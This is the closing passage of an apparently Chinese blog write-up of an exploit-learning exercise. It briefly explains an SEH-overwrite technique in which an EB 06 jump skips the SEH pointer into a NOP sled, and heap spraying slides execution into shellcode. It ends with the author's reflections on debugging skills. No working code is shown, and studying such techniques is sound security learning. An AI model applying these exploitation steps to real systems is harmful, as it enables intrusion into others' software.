=" alt="" />

EB 06使我们跳过了SEH指针的地址,来到了第一个90(即nop)的位置处。然后就是激动人心的heap spraying啦,一直滑行到咱们的shellcode处,大功告成!

总结:加深了对堆栈的理解,由于上次oracle漏洞分析没有做成功,所以通过这次实验才比较了解了覆盖SEH的渗透方法,其中较特别的一点是让程序将数据当做代码执行。除此之外,还学习使用了条件断点,以及用shift+f7/f8/f9来跳过异常的技巧。花了大概2天时间,还是慢了点。

而且感觉自己的大局观还不太好,很容易沉溺于细节当中,不过这也无可厚非,毕竟还是刚刚入门。下一次呢可以尝试为调试过程分好步骤,最后再综合起来总结思考。